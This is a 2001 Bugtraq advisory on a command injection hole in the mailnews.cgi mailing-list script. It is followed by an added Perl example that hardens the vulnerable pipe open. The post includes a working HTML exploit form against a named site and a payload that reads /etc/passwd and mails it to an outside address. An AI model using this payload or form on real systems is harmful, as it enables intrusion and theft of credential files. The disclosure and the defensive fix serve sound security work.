Bugtraq mailing list archives

CGI - mailnews.cgi vulnerability...


From: Kanedaaa Bohater <kaneda () AC PL>
Date: Sun, 18 Feb 2001 22:04:54 +0000

Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the mail list without knowing the
admin password. But this is a small problem ;] . Let's see what more we can
do.
<cat source>
        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is a user from the users file.
Now we can do something like this: add the user "; cat /etc/passwd | mail
adam () malysz pl" and use the subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam () malysz pl"
without quotes ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :   Kanedaaa
        kaneda () ac pl


***$$$###  " And maybe very many will not understand these words...
                But there is no mercy for SONS OF BITCHES .... " ###$$*
kaneda () ac pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..
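
Added example, not part of the original post or of mailnews.cgi: a hardened form of the quoted open() call, combining an address allowlist with a list-form pipe open that never passes $member through a shell. The helper names, the allowlist regex and the stand-in mailer (the running perl echoing its argv) are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened replacement for  open(MAIL, "|$mailprog $member")
use strict;
use warnings;
$| = 1;

# Conservative allowlist (an assumption, far narrower than RFC 5322):
# no whitespace or shell metacharacters, and no leading '-' that a
# mailer could read as an option.
sub is_safe_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

# List-form pipe open: Perl execs @cmd directly, no /bin/sh is involved,
# so $member arrives as exactly one argv element. '--' ends option parsing.
# Entries come from the users file, so they are re-checked at send time.
sub open_mailer {
    my ($member, @cmd) = @_;
    die "rejected address\n" unless is_safe_address($member);
    open(my $fh, '|-', @cmd, '--', $member) or die "Can't run $cmd[0]: $!\n";
    return $fh;
}

# Stand-in for $mailprog so the example runs offline: prints what it received.
my @stand_in = ($^X, '-e', 'print "argv: [$_]\n" for @ARGV; print while <STDIN>');

# Constructed users-file entries; the second is shaped like the entry
# described in the post, with a benign command.
for my $member ('reader@example.org', 'x@example.org; echo INJECTED', '-oQ/tmp') {
    my $fh = eval { open_mailer($member, @stand_in) };
    if (!$fh) { print "skip [$member]: $@"; next; }
    print {$fh} "Subject: news\n\nhello\n";
    close($fh) or warn "mailer exited with status $?\n";
}
```

With a real mailer, @cmd must hold the program path and each option as separate list elements, and the same check belongs in the subscribe handler so that bad entries never reach the users file.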

